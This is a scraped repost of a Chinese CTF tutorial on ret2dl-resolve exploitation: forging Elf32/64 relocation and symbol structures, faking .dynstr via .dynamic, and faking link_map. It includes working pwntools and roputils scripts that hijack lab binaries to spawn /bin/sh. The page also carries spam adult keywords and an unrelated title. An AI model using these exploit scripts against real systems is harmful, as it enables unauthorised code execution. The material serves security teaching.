日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > linux >内容正文

linux

c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)...

發(fā)布時間:2024/9/19 linux 43 豆豆
生活随笔 收集整理的這篇文章主要介紹了 c# 定位内存快速增长_CTF丨Linux Pwn入门教程:针对函数重定位流程的相关测试(下)... 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

Linux Pwn入門教程系列分享已到尾聲,本套課程是作者依據(jù)i春秋Pwn入門課程中的技術(shù)分類,并結(jié)合近幾年賽事中出現(xiàn)的題目和文章整理出一份相對完整的Linux Pwn教程。

教程僅針對i386/amd64下的Linux Pwn常見的Pwn手法,如棧,堆,整數(shù)溢出,格式化字符串,條件競爭等進行介紹,所有環(huán)境都會封裝在Docker鏡像當中,并提供調(diào)試用的教學程序,來自歷年賽事的原題和帶有注釋的python腳本。

今天i春秋與大家分享的是Linux Pwn入門教程中的最后一節(jié)內(nèi)容:針對函數(shù)重定位流程的相關(guān)測試(下),閱讀用時約20分鐘。

注:文末有本套課程所整理的全部內(nèi)容,大家可收藏進行系統(tǒng)學習。

32位下的ret2dl-resolve

通過一系列冗長的源碼閱讀+調(diào)試分析,我們捋了一遍符號重定位的流程,現(xiàn)在我們要站在測試角度看待這個流程了。從上面的分析結(jié)果中我們知道其實最終影響解析的是函數(shù)的名字,那么如果我們強行把write改成system呢?我們來試一下。

我們強行修改內(nèi)存數(shù)據(jù),然后繼續(xù)運行,發(fā)現(xiàn)劫持got表成功,此時write表項是system的地址。

那么我們是不是可以修改dynstr里面的數(shù)據(jù)呢?通過查看內(nèi)存屬性,我們很不幸地發(fā)現(xiàn).rel.plt. .dynsym .dynstr所在的內(nèi)存區(qū)域都不可寫。

這樣一來,我們能夠改變的就只有reloc_arg了。基于上面的分析,我們的思路是在內(nèi)存中偽造Elf32_Rel和Elf32_Sym兩個結(jié)構(gòu)體,并手動傳遞reloc_arg使其指向我們偽造的結(jié)構(gòu)體,讓Elf32_Sym.st_name的偏移值指向預先放在內(nèi)存中的字符串system完成攻擊。為了地址可控,我們首先進行棧劫持并跳轉(zhuǎn)到0x0804834B。

為此我們必須在bss段構(gòu)造一個新的棧,以便棧劫持完成后程序不會崩潰。ROP鏈如下:

#!/usr/bin/python
#coding:utf-8

from pwn import *

context.update(os = 'linux', arch = 'i386')

start_addr = 0x08048350
read_plt = 0x08048310
write_plt = 0x08048340
write_plt_without_push_reloc_arg = 0x0804834b
leave_ret = 0x08048482
pop3_ret = 0x08048519
pop_ebp_ret = 0x0804851b
new_stack_addr = 0x0804a200? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#bss與got表相鄰,_dl_fixup中會降低棧后傳參,設置離bss首地址遠一點防止參數(shù)寫入非法地址出錯

io = remote('172.17.0.2', 10001)

payload = ""
payload += 'A'*140? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#調(diào)用read函數(shù)往新棧寫值,防止leave; retn到新棧后出現(xiàn)ret到地址0上導致出錯
payload += p32(pop3_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#read函數(shù)返回后從棧上彈出三個參數(shù)
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 0
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#buf = new_stack_addr
payload += p32(0x400)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 0x400
payload += p32(pop_ebp_ret)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#把新棧頂給ebp,接下來利用leave指令把ebp的值賦給esp
payload += p32(new_stack_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(leave_ret)

io.send(payload)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#此時程序會停在我們使用payload調(diào)用的read函數(shù)處等待輸入數(shù)據(jù)

payload = ""
payload += "AAAA"? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#leave = mov esp, ebp; pop ebp,占位用于pop ebp
payload += p32(write_plt_without_push_reloc_arg)? ?? ???#按照我們的測試方案,強制程序?qū)rite函數(shù)重定位,reloc_arg由我們手動放入棧中
payload += p32(0x18)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #手動傳遞write的reloc_arg,調(diào)用write
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#函數(shù)執(zhí)行完后返回start
payload += p32(1)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#fd = 1
payload += p32(0x08048000)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#buf = ELF程序加載開頭,write會輸出ELF
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#size = 4
io.send(payload)

測試結(jié)果:

我們可以看到調(diào)用成功了。我們發(fā)現(xiàn)其實跳轉(zhuǎn)到write_plt_without_push_reloc_arg上,還是會直接跳轉(zhuǎn)到PLT[0],所以我們可以把這個地址改成PLT[0]的地址。

接下來我們開始著手在新的棧上偽造兩個結(jié)構(gòu)體:

write_got = 0x0804a018? ?? ???
new_stack_addr = 0x0804a500? ?? ?? ?? ?? ?? ?? ?? ?#bss與got表相鄰,_dl_fixup中會降低棧后傳參,設置離bss首地址遠一點防止參數(shù)寫入非法地址出錯
relplt_addr = 0x080482b0? ?? ?? ?? ?? ?? ?? ?? ?#.rel.plt的首地址,通過計算首地址和新棧上我們偽造的結(jié)構(gòu)體Elf32_Rel偏移構(gòu)造reloc_arg
dymsym_addr = 0x080481cc? ?? ?? ?? ?? ?? ?? ?? ?#.dynsym的首地址,通過計算首地址和新棧上我們偽造的Elf32_Sym結(jié)構(gòu)體偏移構(gòu)造Elf32_Rel.r_info
dynstr_addr = 0x0804822c? ?? ?? ?? ?? ?? ?? ?? ?#.dynstr的首地址,通過計算首地址和新棧上我們偽造的函數(shù)名字符串system偏移構(gòu)造Elf32_Sym.st_name

fake_Elf32_Rel_addr = new_stack_addr + 0x50? ?? ???#在新棧上選擇一塊空間放偽造的Elf32_Rel結(jié)構(gòu)體,結(jié)構(gòu)體大小為8字節(jié)
fake_Elf32_Sym_addr = new_stack_addr + 0x5c? ?? ???#在偽造的Elf32_Rel結(jié)構(gòu)體后面接上偽造的Elf32_Sym結(jié)構(gòu)體,結(jié)構(gòu)體大小為0x10字節(jié)
binsh_addr = new_stack_addr + 0x74? ?? ?? ?? ?? ?? ?? ?? ?#把/bin/sh\x00字符串放在最后面

fake_reloc_arg = fake_Elf32_Rel_addr - relplt_addr? ?? ???#計算偽造的reloc_arg

fake_r_info = ((fake_Elf32_Sym_addr - dymsym_addr)/0x10) << 8 | 0x7 #偽造r_info,偏移要計算成下標,除以Elf32_Sym的大小,最后一字節(jié)為0x7

fake_st_name = new_stack_addr + 0x6c - dynstr_addr? ?? ?? ?? ?? ? #偽造的Elf32_Sym結(jié)構(gòu)體后面接上偽造的函數(shù)名字符串system

fake_Elf32_Rel_data = ""
fake_Elf32_Rel_data += p32(write_got)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ? #r_offset = write_got,以免重定位完畢回填got表的時候出現(xiàn)非法內(nèi)存訪問錯誤
fake_Elf32_Rel_data += p32(fake_r_info)

fake_Elf32_Sym_data = ""
fake_Elf32_Sym_data += p32(fake_st_name)
fake_Elf32_Sym_data += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#后面的數(shù)據(jù)直接套用write函數(shù)的Elf32_Sym結(jié)構(gòu)體,具體成員變量含義自行搜索
fake_Elf32_Sym_data += p32(0)
fake_Elf32_Sym_data += p32(0x12)

我們把新棧的地址向后調(diào)整了一點,因為在調(diào)試深入到_dl_fixup的時候發(fā)現(xiàn)某行指令試圖對got表寫入,而got表正好就在bss的前面,緊接著bss,為了防止運行出錯,我們進行了調(diào)整。此外,需要注意的是偽造的兩個結(jié)構(gòu)體都要與其首地址保持對齊。完成了結(jié)構(gòu)體偽造之后,我們將這些內(nèi)容放在新棧中,調(diào)試的時候確認整個偽造的鏈條正確,pwn it!

64位下的ret2dl-resolve

與32位不同,在64位下,雖然_dl_fixup函數(shù)的邏輯沒有改變,但是許多相關(guān)的變量和結(jié)構(gòu)體都有了變化。例如在glibc/sysdeps/x86_64/dl-runtime.c中定義了reloc_offset和reloc_index:

#define reloc_offset reloc_arg * sizeof (PLTREL)
#define reloc_index??reloc_arg

#include

我們可以推斷出reloc_arg已經(jīng)不像32位中是作為一個偏移值存在,而是作為一個數(shù)組下標存在。此外,兩個關(guān)鍵的結(jié)構(gòu)體也做出了調(diào)整:Elf32_Rel升級為Elf64_Rela, Elf32_Sym升級為Elf64_Sym,這兩個結(jié)構(gòu)體的大小均為0x18。

typedef struct
{
??Elf64_Addr? ?? ???r_offset;? ?? ?? ?? ?? ? /* Address */
??Elf64_Xword? ?? ???r_info;? ?? ?? ?? ?? ?? ?? ?? ?/* Relocation type and symbol index */
??Elf64_Sxword? ?? ???r_addend;? ?? ?? ?? ?? ? /* Addend */
} Elf64_Rela;

typedef struct
{
??Elf64_Word? ?? ???st_name;? ?? ?? ?? ?? ? /* Symbol name (string tbl index) */
??unsigned char? ?? ???st_info;? ?? ?? ?? ?? ? /* Symbol type and binding */
??unsigned char st_other;? ?? ?? ?? ?? ? /* Symbol visibility */
??Elf64_Section? ?? ???st_shndx;? ?? ?? ?? ?? ? /* Section index */
??Elf64_Addr? ?? ???st_value;? ?? ?? ?? ?? ? /* Symbol value */
??Elf64_Xword? ?? ???st_size;? ?? ?? ?? ?? ? /* Symbol size */
} Elf64_Sym;

此外,_dl_runtime_resolve的實現(xiàn)位于glibc/sysdeps/x86_64/dl-trampoline.h中,其代碼加了宏定義之后可讀性很差,核心內(nèi)容仍然是調(diào)用_dl_fixup,此處不再分析。


最后,在64位下進行ret2dl-resolve還有一個問題,即我們在分析源碼時提到但是應用中卻忽略的一個潛在數(shù)組越界:

? ?? ?if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
? ?? ???{
? ?? ?? ? const ElfW(Half) *vernum =
? ?? ?? ?? ?(const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
? ?? ?? ? ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
? ?? ?? ? version = &l->l_versions[ndx];
? ?? ?? ? if (version->hash == 0)
? ?? ?? ?? ?version = NULL;
? ?? ???}

這里會使用reloc->r_info的高位作為下標產(chǎn)生了ndx,然后在link_map的成員數(shù)組變量l_versions中取值作為version。為了在偽造的時候正確定位到sym,r_info必然會較大。在32位的情況下,由于程序的映射較為緊湊, reloc->r_info的高24位導致vernum數(shù)組越界的情況較少。

由于程序映射的原因,vernum數(shù)組首地址后面有大片內(nèi)存都是以0x00填充,測試導致reloc->r_info的高24位過大后從vernum數(shù)組中獲取到的ndx有很大概率是0,從而由于ndx異常導致l_versions數(shù)組越界的幾率也較低。我們可以對照源碼,IDA調(diào)試進入_dl_fixup后,將斷點下在if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL)附近。

中斷后切換到匯編

單步運行到movzx edx, word ptr [edx+esi*2]一行

觀察edx的值,此處為0x0804827c, edx+esi*2 = 0x08048284,查看程序的內(nèi)存映射情況。

一直到地址0x0804b000都是可讀的,所以esi,也就是reloc->r_info的高24位最高可以達到0x16c2,考慮到.dymsym與.bss的間隔,這個允許范圍基本夠用。繼續(xù)往下看:

此時的edi = 0xf7fa9918,[edi+170h]保存的值為0Xf7f7eb08,其后連續(xù)可讀的地址最大值為0xf7faa000,因此mov ecx, [edx+4]一行,按照之前幾行匯編代碼的算法,只要取出的edx值不大于(0xf7faa000-0xf7f7eb08)/0x10 = 0x2b4f,version = &l->l_versions[ndx];就不會產(chǎn)生非法內(nèi)存訪問。仔細觀察會發(fā)現(xiàn)0x0804827c~0x0804b000之間幾乎所有的2字節(jié)word型數(shù)據(jù)都符合要求。因此,大部分情況下32位的題目很少會產(chǎn)生ret2dl-resolve在此處造成的段錯誤。

而對于64位,我們用相同的方法調(diào)試本節(jié)的例子~/XMAN 2016-level3_64/level3_64會發(fā)現(xiàn)由于我們常用的bss段被映射到了0x600000之后,而dynsym的地址仍然在0x400000附近,r_info的高位將會變得很大,再加上此時vernum也在0x400000附近,vernum[ELFW(R_SYM) (reloc->r_info)]將會有很大概率落在在0x400000~0x600000間的不可讀區(qū)域。

從而產(chǎn)生一個段錯誤。為了防止出現(xiàn)這個錯誤,我們需要修改判斷流程,使得l->l_info[VERSYMIDX (DT_VERSYM)]為0,從而繞開這塊代碼。而l->l_info[VERSYMIDX (DT_VERSYM)]在64位中的位置就是link_map+0x1c8(對應的,32位下為link_map+0xe4),所以我們需要泄露link_map地址并將link_map置為0。

64位下的ret2dl-resolve與32位下的ret2dl-resolve除了上述一些變化之外,exp構(gòu)造流程并沒有什么區(qū)別,在此處不再贅述,詳細腳本可見于附件。

理論上來說,ret2dl-resolve對于所有存在棧溢出,沒有Full RELRO(如果開啟了Full RELRO,所有符號將會在運行時被全部解析,也就不存在_dl_fixup了)且有一個已知確定的棧地址(可以通過stack pivot劫持棧到已知地址)的程序都適用。但是我們從上面的64位ret2dl-resolve中可以看到其必須泄露link_map的地址才能完成利用,對于32位程序來說也可能出現(xiàn)同樣的問題。如果出現(xiàn)了不存在輸出的棧溢出程序,我們就沒辦法用這種套路了,那我們該怎么辦呢?接下來的幾節(jié)我們將介紹一些不依賴泄露的攻擊手段。

使用ROPutils簡化攻擊步驟

從上面32位和64位的攻擊腳本我們不難看出來,雖然構(gòu)造payload的過程很繁瑣,但是實際上大部分代碼的格式都是固定的,我們完全可以把它們封裝成一個函數(shù)進行調(diào)用。當然,我們還可以當一把懶人,直接用別人寫好的庫。例如項目ROPutils(https://github.com/inaz2/roputils)

閱讀代碼roputils.py,其大部分我們會用到的東西都在ROP*和FormatStr這幾個類中,不過ROPutils也提供了其他的輔助工具類和函數(shù)。當然,在本節(jié)中我們只會介紹和ret2dl-resolve相關(guān)的一些函數(shù)的用法,不做源碼分析和過多的介紹。

我們可以直接把roputils.py和自己寫的腳本放在同一個文件夾下以使用其中的功能。以~/XMAN 2016-level3/level4為例。其實我們會發(fā)現(xiàn)fake dl-resolve并不一定需要進行棧劫持,我們只要確保偽造的link_map所在地址已知,且地址能被作為參數(shù)傳入_dl_fixup即可。我們先來構(gòu)造一個棧溢出,調(diào)用read讀取偽造的link_map到.bss中。

from roputils import *
#為了防止命名沖突,這個腳本全部只使用roputils中的代碼。如果需要使用pwntools中的代碼需要在import roputils前import pwn,以使得roputils中的ROP覆蓋掉pwntools中的ROP

rop = ROP('./level4')? ?? ?? ?? ?? ?? ?? ?? ?#ROP繼承了ELF類,下面的section, got, plt都是調(diào)用父類的方法
bss_addr = rop.section('.bss')
read_got = rop.got('read')
read_plt = rop.plt('read')

offset = 140

io = Proc(host = '172.17.0.2', port = 10001)? ?? ???#roputils中這里需要顯式指定參數(shù)名

buf = rop.fill(offset)? ?? ?? ?? ?? ?? ?? ?? ?#fill用于生成填充數(shù)據(jù)
buf += rop.call(read_plt, 0, bss_addr, 0x100)? ?? ???#call可以通過某個函數(shù)的plt地址方便地進行調(diào)用
buf += rop.dl_resolve_call(bss_addr+0x20, bss_addr)? ?? ???#dl_resolve_call有一個參數(shù)base和一個可選參數(shù)列表*args。base為偽造的link_map所在地址,*args為要傳遞給被劫持調(diào)用的函數(shù)的參數(shù)。這里我們將"/bin/sh\x00"放置在bss_addr處,link_map放置在bss_addr+0x20處
io.write(buf)
然后我們直接用dl_resolve_data生成偽造的link_map并發(fā)送
buf = rop.string('/bin/sh')? ?? ?? ?? ?? ?
buf += rop.fill(0x20, buf)? ?? ?? ?? ?? ? #如果fill的第二個參數(shù)被指定,相當于將第二個參數(shù)命名的字符串填充至指定長度
buf += rop.dl_resolve_data(bss_addr+0x20, 'system')? ?? ???#dl_resolve_data的參數(shù)也非常簡單,第一個參數(shù)是偽造的link_map首地址,第二個參數(shù)是要偽造的函數(shù)名
buf += rop.fill(0x100, buf)
io.write(buf)

然后我們直接使用io.interact(0)就可以打開一個shell了。

關(guān)于roputils的用法可以參考其github倉庫中的examples,其他練習程序不再提供對應的roputils寫法的腳本。

在.dynamic節(jié)中偽造.dynstr節(jié)地址

在32位的ret2dl-resolve一節(jié)中我們已經(jīng)發(fā)現(xiàn),ELF開發(fā)小組為了安全,設置.rel.plt. .dynsym .dynstr三個重定位相關(guān)的節(jié)區(qū)均為不可寫。然而ELF文件中有一個.dynamic節(jié),其中保存了動態(tài)鏈接器所需要的基本信息,而我們的.dynstr也屬于這些基本信息中的一個。

如果一個程序沒有開啟RELRO(即checksec顯示No RELRO).dynamic節(jié)是可寫的。(Partial RELRO和Full RELRO會在程序加載完成時設置.dynamic為不可寫,因此盡管readelf顯示其為可寫也不可相信)

.dynamic節(jié)中只包含Elf32/64_Dyn結(jié)構(gòu)體類型的數(shù)據(jù),這兩個結(jié)構(gòu)體定義在glibc/elf/elf.h下:

typedef struct
{
??Elf32_Sword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf32_Word d_val;? ?? ?? ?? ?? ?? ?? ?? ?/* Integer value */
? ?? ?Elf32_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf32_Dyn;

typedef struct
{
??Elf64_Sxword? ?? ???d_tag;? ?? ?? ?? ?? ?? ?? ?? ?/* Dynamic entry type */
??union
? ? {
? ?? ?Elf64_Xword d_val;? ?? ?? ?? ?? ? /* Integer value */
? ?? ?Elf64_Addr d_ptr;? ?? ?? ?? ?? ?? ?? ?? ?/* Address value */
? ? } d_un;
} Elf64_Dyn;

從結(jié)構(gòu)體的定義我們可以看出其由一個d_tag和一個union類型組成,union中的兩個變量會隨著不同的d_tag進行切換,我們通過readelf看一下.dynstr的d_tag。

其標記為0x05,union變量顯示為值0x0804820c。我們看一下內(nèi)存中.dynamic節(jié)中.dynstr對應的Elf32_Dyn結(jié)構(gòu)體和指針指向的數(shù)據(jù)。

因此,我們只需要在棧溢出后程序中仍然存在至少一個未執(zhí)行過的函數(shù),我們就可以修改.dynstr對應結(jié)構(gòu)體中的地址,從而使其指向我們偽造的.dynstr數(shù)據(jù),進而在解析的時候解析出我們想要的函數(shù)。

我們以32位的程序為例,打開~/fake_dynstr32/fake_dynstr32。

這個程序滿足了我們需要的一切條件——No RELRO,棧溢出發(fā)生在vuln中,exit不會被調(diào)用,因此我們可以用上述方法進行攻擊。首先我們把所有的字符串從里面拿出來,并且把exit替換成system。

call_exit_addr = 0x08048495
read_plt = 0x08048300
start_addr = 0x08048350
dynstr_d_ptr_address = 0x080496a4
fake_dynstr_address = 0x08049800
fake_dynstr_data = "\x00libc.so.6\x00_IO_stdin_used\x00system\x00\x00\x00\x00\x00\x00read\x00__libc_start_main\x00__gmon_start__\x00GLIBC_2.0\x00"

注意由于memset的一部分也會被system覆蓋掉,我們應該把剩余的部分設置為\x00,防止后面的符號偏移值錯誤。memset由于是在read函數(shù)運行之前運行的,所以它的符號已經(jīng)沒用了,可以被覆蓋掉。


接下來我們構(gòu)造ROP鏈依次寫入偽造的dynstr字符串和其保存在Elf32_Dyn中的地址。

io = remote("172.17.0.2", 10001)

payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#修改.dynstr對應的Elf32_Dyn.d_ptr
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
payload += p32(dynstr_d_ptr_address)? ?? ???
payload += p32(4)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?
io.send(payload)
sleep(0.5)
io.send(p32(fake_dynstr_address))? ?? ?? ?? ?? ? #新的.dynstr地址
sleep(0.5)

payload = ""
payload += 'A'*22? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#padding
payload += p32(read_plt)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#在內(nèi)存中偽造一塊.dynstr字符串
payload += p32(start_addr)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???
payload += p32(0)? ?? ?? ?? ?? ?
payload += p32(fake_dynstr_address)
payload += p32(len(fake_dynstr_data)+8)? ?? ???#長度是.dynstr加上8,把"/bin/sh\x00"接在后面
io.send(payload)
sleep(0.5)
io.send(fake_dynstr_data+"/bin/sh\x00")? ?? ???#把/bin/sh\x00接在后面
sleep(0.5)

此時還剩下函數(shù)exit未被調(diào)用,我們通過前面的步驟偽造了.dynstr,將其中的exit改成了system,因此根據(jù)_dl_fixup的原理,此時函數(shù)將會解析system的首地址并返回到system上。

64位下的利用方式與32位下并沒有區(qū)別,此處不再進行詳細分析。

fake link_map

由于各種保護方式的普及,現(xiàn)在能碰到No RELRO的程序已經(jīng)很少了,因此上節(jié)所述的攻擊方式能用上的機會并不多,所以這節(jié)我們介紹另外一種方式——通過偽造link_map結(jié)構(gòu)體進行攻擊。

在前面的源碼分析中,我們主要把目光集中在未解析過的函數(shù)在_dl_fixup的流程中而忽略了另外一個分支。

_dl_fixup (
# ifdef ELF_MACHINE_RUNTIME_FIXUP_ARGS
? ?? ?? ???ELF_MACHINE_RUNTIME_FIXUP_ARGS,
# endif
? ?? ?? ???struct link_map *l, ElfW(Word) reloc_arg)
{
??………… //變量定義,初始化等等
??if (__builtin_expect (ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0) //判斷函數(shù)是否被解析過。此前我們一直利用未解析過的函數(shù)的結(jié)構(gòu)體,所以這里的if始終成立
? ?…………
? ?? ?result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);
…………
? ? }
??else
? ? {
? ?? ?/* We already found the symbol.??The module (and therefore its load
? ?? ?? ?address) is also known.??*/
? ?? ?value = DL_FIXUP_MAKE_VALUE (l, l->l_addr + sym->st_value);
? ?? ?result = l;
? ? }
…………
}

通過注釋我們可以看到之前的if起的是判斷函數(shù)是否被解析過的作用,如果函數(shù)被解析過,_dl_fixup就不會調(diào)用_dl_lookup_symbol_x對函數(shù)進行重定位,而是直接通過宏DL_FIXUP_MAKE_VALUE計算出結(jié)果。這邊用到了link_map的成員變量l_addr和Elf32/64_Sym的成員變量st_value。這里的l_addr是實際映射地址和原來指定的映射地址的差值,st_value根據(jù)對應節(jié)的索引值有不同的含義。

不過在這里我們并不需要關(guān)心那么多,我們只需要知道如果我們能使l->l_addr + sym->st_value指向一個函數(shù)的在內(nèi)存中的實際地址,那么我們就能返回到這個函數(shù)上。但是問題來了,如果我們知道了system在內(nèi)存中的實際地址,我們何苦用那么麻煩的方式跳轉(zhuǎn)到system上呢?所以答案是我們不知道。

我們需要做的是讓l->l_addr和sym->st_value其中之一落在got表的某個已解析的函數(shù)上(如__libc_start_main),而另一個則設置為system函數(shù)和這個函數(shù)的偏移值。既然我們都偽造了link_map,那么顯然l_addr是我們可以控制的,而sym根據(jù)我們的源碼分析,它的值最終也是從link_map中獲得的(很多節(jié)區(qū)地址,包括.rel.plt, .dynsym, dynstr都是從中取值,更多細節(jié)可以對比調(diào)試時的link_map數(shù)據(jù)與源碼進行學習)

const ElfW(Sym) *const symtab= (const void *) D_PTR (l, l_info[DT_SYMTAB]);
??const char *strtab = (const void *) D_PTR (l, l_info[DT_STRTAB]);

??const PLTREL *const reloc
? ? = (const void *) (D_PTR (l, l_info[DT_JMPREL]) + reloc_offset);
??const ElfW(Sym) *sym = &symtab[ELFW(R_SYM) (reloc->r_info)];

所以這兩個值我們都可以進行偽造。此時只要我們知道libc的版本,就能算出system與已解析函數(shù)之間的偏移了。


說到這里可能有人會想到,既然偽造的link_map那么厲害,那么我們?yōu)槭裁床辉谇懊娴膁l-resolve中直接偽造出.dynstr的地址,而要通過一條冗長的求值鏈返回到system呢?我們來看一下上面的這行代碼:

? ?? ?result = _dl_lookup_symbol_x (strtab + sym->st_name, l, &sym, l->l_scope,
? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?version, ELF_RTYPE_CLASS_PLT, flags, NULL);

根據(jù)位于glibc/include/Link.h中的link_map結(jié)構(gòu)體定義,這里的l_scope是一個當前l(fā)ink_map的查找范圍數(shù)組。我們從link_map結(jié)構(gòu)體的定義可以看出來其實這是一個雙鏈表,每一個link_map元素都保存了一個函數(shù)庫的信息。當查找某個符號的時候,實際上是通過遍歷整個雙鏈表,在每個函數(shù)庫中進行的查詢。顯然,我們不可能知道libc的link_map地址,所以我們沒辦法偽造l_scope,也就沒辦法偽造整個link_map使流程進入_dl_lookup_symbol_x,只能選擇讓流程進入“函數(shù)已被解析過”的分支。


回到主題,我們?yōu)榱俗尯瘮?shù)流程繞過_dl_lookup_symbol_x,必須偽造sym使得ELFW(ST_VISIBILITY) (sym->st_other), 0) == 0,根據(jù)sym的定義,我們就得偽造symtab和reloc->r_info,所以我們得偽造DT_SYMTAB, DT_JMPREL,此外,我們得偽造strtab為可讀地址,所以還得偽造DT_STRTAB,所以我們需要偽造link_map前0xf8個字節(jié)的數(shù)據(jù),需要關(guān)注的分別是位于link_map+0的l_addr,位于link_map+0x68的DT_STRTAB指針,位于link_map+0x70的DT_SYMTAB指針和位于link_map+0xF8的DT_JMPREL指針。

此外,我們需要偽造Elf64_Sym結(jié)構(gòu)體,Elf64_Rela結(jié)構(gòu)體,由于DT_JMPREL指向的是Elf64_Dyn結(jié)構(gòu)體,我們也需要偽造一個這樣的結(jié)構(gòu)體。當然,我們得讓reloc_offset為0.為了偽造的方便,我們可以選擇讓l->l_addr為已解析函數(shù)內(nèi)存地址和system的偏移,sym->st_value為已解析的函數(shù)地址的指針-8,即其got表項-8。(這部分在源碼中似乎并沒有體現(xiàn)出來,但是調(diào)試的時候發(fā)現(xiàn)實際上會+8,原因不明)我們還是以~/XMAN 2016-level3_64/level3_64為例進行分析。


首先我們來構(gòu)造一個fake link_map:

fake_link_map_data = ""
fake_link_map_data += p64(offset)? ?? ?? ?? ?? ?? ?? ?? ?# +0x00 l_addr offset = system - __libc_start_main
fake_link_map_data += '\x00'*0x60
fake_link_map_data += p64(DT_STRTAB)? ?? ?? ?? ?? ? #+0x68 DT_STRTAB
fake_link_map_data += p64(DT_SYMTAB)? ?? ?? ?? ?? ? #+0x70 DT_SYMTAB
fake_link_map_data += '\x00'*0x80
fake_link_map_data += p64(DT_JMPREL)? ?? ?? ?? ?? ? #+0xf8 DT_JMPREL
后面的link_map數(shù)據(jù)由于我們用不上就不構(gòu)造了。根據(jù)我們的分析,我們留出來四個8字節(jié)數(shù)據(jù)區(qū)用來填充相應的數(shù)據(jù),其他部分都置為0.
接下來我們偽造出三個結(jié)構(gòu)體
fake_Elf64_Dyn = ""
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_tag
fake_Elf64_Dyn += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#d_ptr

fake_Elf64_Rela = ""
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_offset
fake_Elf64_Rela += p64(7)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#r_info
fake_Elf64_Rela += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#r_addend

fake_Elf64_Sym = ""
fake_Elf64_Sym += p32(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_name
fake_Elf64_Sym += 'AAAA'? ?? ?? ?? ?? ?? ?? ?? ?? ?? ???#st_info, st_other, st_shndx
fake_Elf64_Sym += p64(main_got-8)? ?? ?? ?#st_value
fake_Elf64_Sym += p64(0)? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?#st_size

顯然我們必須把r_info設置為7以通過檢查。為了使ELFW(ST_VISIBILITY) (sym->st_other)不為0從而躲過_dl_lookup_symbol_x,我們直接把st_other設置為非0.st_other也必須為非0以避開_dl_lookup_symbol_x,進入我們希望要的分支。

